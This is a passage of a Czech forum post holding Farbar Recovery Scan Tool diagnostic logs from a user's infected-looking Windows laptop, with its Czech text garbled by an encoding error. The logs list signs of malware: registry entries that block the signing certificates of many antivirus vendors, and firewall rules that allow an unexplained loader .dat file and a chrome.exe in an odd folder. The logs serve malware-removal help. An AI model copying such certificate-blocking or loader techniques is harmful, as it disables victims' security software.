FirewallRules: [UDP Query User{0F4B903E-F1F8-4CBE-BAEE-07060F035D9F}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [TCP Query User{254EF6D7-44E4-4750-B932-50AAA208A674}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [UDP Query User{496F1EEA-1683-4C80-8812-554310DD78C9}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [TCP Query User{012743A7-F4A7-4C56-98E9-76E477112C43}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Block) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [UDP Query User{0E6E9637-7C34-45AB-876A-C0DCBA7C3481}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Block) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [TCP Query User{79D6499D-1CB3-4783-9F1A-BEB2959BD6EE}C:\bestgames\counter-strike 1.6\hl.exe] => (Allow) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [UDP Query User{CE7F6B25-9762-40FA-841D-0A2440DFC84F}C:\bestgames\counter-strike 1.6\hl.exe] => (Allow) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [{BC0F26F9-B3D7-4186-887C-546DB34D5738}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{4F6BB88C-4AF9-4B8F-8135-6E3624A3208A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{F896E933-572E-490B-B94B-76CA5A7BF17D}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [UDP Query User{B85DB95C-4D1B-4206-84CB-8B762BE82226}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [{22CEAD00-603E-4F6B-BB96-DF467AEE1D20}] => (Allow) C:\WINDOWS\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{36938469-2BD5-441E-BB81-3687F9EDC7C1}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc -> Google Inc.)
FirewallRules: [{7CA3E41B-1AE5-4D81-86FB-D775491F5F81}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{17FA4FD6-CC17-46AC-9927-62A18248780E}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [TCP Query User{B53D76DE-C05D-4DB4-A477-1E4468E57B52}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6D9EEFC5-8583-483E-AEC2-6517284644E7}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{82ECBD6C-F70A-415E-9FB3-41BEEF19225D}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{BEB4EEBE-4936-4730-A954-92839929F90C}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{385AF33F-8FE9-40AC-A283-DF6A1E2ABC61}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [{E0857A25-CB37-43E6-9565-60217EF63BCF}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [{A8A4AF2D-7915-4A6C-A840-EDC5B3AF4A6F}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe (Electronic Arts -> Electronic Arts Inc.)
FirewallRules: [{608095AD-D8FD-42A6-BDDB-2313CB49CFC6}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe (Electronic Arts -> Electronic Arts Inc.)
FirewallRules: [TCP Query User{272C686D-A3B3-432A-87B1-A9193632FFD0}C:\program files\need for speed underground 2\need for speed underground 2.exe] => (Allow) C:\program files\need for speed underground 2\need for speed underground 2.exe () [File not signed]
FirewallRules: [UDP Query User{ABBED1A7-66DB-4C35-A3FA-B1B0B3C6B030}C:\program files\need for speed underground 2\need for speed underground 2.exe] => (Allow) C:\program files\need for speed underground 2\need for speed underground 2.exe () [File not signed]
FirewallRules: [TCP Query User{9D3457A1-E386-4DA3-82E5-EBBA69CF8EF2}C:\bestgames\counter-strike 1.6\hl.exe] => (Block) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [UDP Query User{5EDF1ABE-9F45-4732-84C9-FF5C27C43202}C:\bestgames\counter-strike 1.6\hl.exe] => (Block) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [{A4676607-3187-412F-9D62-0052028896C2}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{FCA43FE9-0673-4559-AD98-20D413A26796}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{FE7E10A1-2D41-481D-B952-2F339A675E0D}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{B91FABF4-72D5-4A1E-8EAB-0E79D8F3DC23}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [TCP Query User{E5A70F91-23C9-4882-B8D5-B36D523CD235}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [UDP Query User{BBF6061D-863C-445A-B6CE-66D7391E0420}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [TCP Query User{75D7BEC9-18F5-44DF-B616-F36B1618A24F}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [UDP Query User{0BE16C34-C787-47BB-B06E-093E006EB1DC}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [TCP Query User{E03CF743-B44B-482F-A3DC-231E10A1092E}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{FFFA7C12-D58B-4B21-8B4E-7B4413B5D2CF}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [{6E2A124B-2064-4854-98B3-066DF792EC84}] => (Allow) %systemroot%\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)

==================== Restore Points =========================

19-07-2019 13:31:12 Removed Google Update Helper
29-07-2019 21:06:16 Windows Update
30-07-2019 00:34:51 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727
30-07-2019 00:35:48 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727

==================== Faulty Device Manager Devices =============

Name: Ralink Bluetooth PCIe Adapter
Description: Ralink Bluetooth PCIe Adapter
Class Guid: {d2de069d-7286-420b-baf8-225d700ce748}
Manufacturer: Ralink Technology Corp.
Service: rtbth
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.

==================== Event log errors: =========================

Application errors:
==================
Error: (07/30/2019 01:02:33 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program Wow.exe verze 4.3.4.15595 pĹ™estal spolupracovat se systĂ©mem Windows a byl ukonÄŤen. Chcete-li zjistit, zda je k dispozici vĂce informacĂ o tomto problĂ©mu, vyhledejte historii problĂ©mu v ovlĂˇdacĂm panelu Centrum akcĂ.

ID procesu: 12ec

ÄŚas spuĹˇtÄ›nĂ: 01d546610d357141

ÄŚas ukonÄŤenĂ: 4294967295

Cesta k aplikaci: C:\Users\Radim\Desktop\World of Warcraft Cataclysm 4.3.4\Wow.exe

ID hlĂˇĹˇenĂ: ef9c84b7-b254-11e9-805d-b4b52f8204d5

ĂšplnĂ˝ nĂˇzev chybujĂcĂho balĂÄŤku:

ID aplikace souvisejĂcĂ s chybujĂcĂm balĂÄŤkem:

Error: (07/29/2019 11:42:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: NĂˇzev chybujĂcĂ aplikace: firefox.exe, verze: 68.0.1.7137, ÄŤasovĂ© razĂtko: 0x5d2f6e3d
NĂˇzev chybujĂcĂho modulu: ucrtbase.DLL, verze: 10.0.17134.12, ÄŤasovĂ© razĂtko: 0x587decd7
KĂłd vĂ˝jimky: 0xc0000409
Posun chyby: 0x000000000006e75e
ID chybujĂcĂho procesu: 0x754
ÄŚas spuĹˇtÄ›nĂ chybujĂcĂ aplikace: 0x01d546523d5f9cc2
Cesta k chybujĂcĂ aplikaci: C:\Program Files\Mozilla Firefox\firefox.exe
Cesta k chybujĂcĂmu modulu: C:\Program Files\Mozilla Firefox\ucrtbase.DLL
ID zprĂˇvy: bf5afe14-b249-11e9-805c-b4b52f8204d5
ĂšplnĂ˝ nĂˇzev chybujĂcĂho balĂÄŤku:
ID aplikace souvisejĂcĂ s chybujĂcĂm balĂÄŤkem:

Error: (07/29/2019 11:26:42 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15157

Error: (07/29/2019 11:26:42 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15157

Error: (07/29/2019 11:26:42 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (07/29/2019 02:03:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15297

Error: (07/29/2019 02:03:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15297

Error: (07/29/2019 02:03:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

System errors:
=============
Error: (07/30/2019 01:45:40 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:41:40 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:37:40 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:33:40 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:29:40 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:25:38 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:21:38 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Error: (07/30/2019 01:17:38 AM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: U aktivace identifikĂˇtoru CLSID {E60687F7-01A1-40AA-86AC-DB1CBF673334} vyprĹˇel ÄŤasovĂ˝ limit bÄ›hem ÄŤekĂˇnĂ na zastavenĂ sluĹľby wuauserv.

Windows Defender:
===================================
Date: 2014-11-27 21:21:00.958
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {3598E1E8-509B-448D-9F28-410E0B0A5AA5}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-26 14:58:20.024
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {DBD3A4C0-B79D-4D17-9E45-D04CB6EC5BEA}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-26 14:48:41.240
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {BCC9A0C4-C9EC-4867-9200-74C7FAC1CC47}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 13:06:01.780
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {3297DFFE-B253-4847-809B-4741D32948F5}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 12:31:44.371
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {2B4D8610-91E7-48B8-ACB0-3B19DC54C8F7}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 11:41:38.983
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.189.487.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11202.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

Date: 2014-11-23 11:41:38.983
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.189.487.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11202.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

Date: 2014-11-17 18:47:46.928
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.187.2317.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11104.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

CodeIntegrity:
===================================

Date: 2019-07-27 20:57:26.770
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-26 19:15:41.306
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-24 12:39:00.236
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 22:27:24.774
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 21:39:45.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 17:19:19.601
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-16 20:53:35.955
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-15 13:18:05.256
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: Hewlett-Packard 68IRR Ver. F.60 01/15/2015
Motherboard: Hewlett-Packard 17F6
Processor: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz
Percentage of memory in use: 51%
Total physical RAM: 8075.45 MB
Available physical RAM: 3901.19 MB
Total Virtual: 9355.45 MB
Available Virtual: 4511.55 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:680.44 GB) (Free:137.94 GB) NTFS
Drive f: () (Removable) (Total:29.32 GB) (Free:9.68 GB) FAT32

\\?\Volume{1f8b2cff-7fc1-4bf4-a5b8-4b4cea060f9f}\ (ObnovenĂ) (Fixed) (Total:0.29 GB) (Free:0.27 GB) NTFS
\\?\Volume{9cc4e974-0124-45b5-9f74-42f4920ddb47}\ () (Fixed) (Total:0.44 GB) (Free:0.12 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 698.6 GB) (Disk ID: 00C200C1)

Partition: GPT.

========================================================
Disk: 1 (Protective MBR) (Size: 29.3 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

kovadlina11 · #2 Příspěvek od **kovadlina11** » 30 črc 2019 09:49

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-07-2019
Ran by Radim (administrator) on RADIM-NTB (Hewlett-Packard HP ProBook 4540s) (30-07-2019 10:35:24)
Running from C:\Users\Radim\Desktop
Loaded Profiles: Radim (Available Profiles: Spravce & Radim)
Platform: Windows 8.1 (Update) (X64) Language: ÄŚeĹˇtina (ÄŚeskĂˇ republika)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\WINDOWS\runservice.exe
(Advanced Micro Devices Inc.) [File not signed] C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\MOM.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Hewlett-Packard Company -> Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company -> Hewlett-Packard Company) C:\WINDOWS\System32\hpservice.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxHK.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation -> Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\WINDOWS\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\WINDOWS\System32\atiesrxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> Pixart Imaging Inc) C:\WINDOWS\System32\TiltWheelMouse.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\WINDOWS\SysWOW64\svchost.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Riot Games, Inc. -> ) C:\Riot Games\League of Legends\LeagueClient.exe
(Riot Games, Inc. -> ) C:\Riot Games\League of Legends\LeagueClientUx.exe
(Riot Games, Inc. -> ) C:\Riot Games\League of Legends\LeagueClientUxRender.exe
(Riot Games, Inc. -> ) C:\Riot Games\League of Legends\LeagueClientUxRender.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TeamViewer -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MouseDriver] => C:\WINDOWS\system32\TiltWheelMouse.exe [241152 2013-04-09] (Microsoft Windows Hardware Compatibility Publisher -> Pixart Imaging Inc)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [269192 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [285832 2014-04-29] (Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
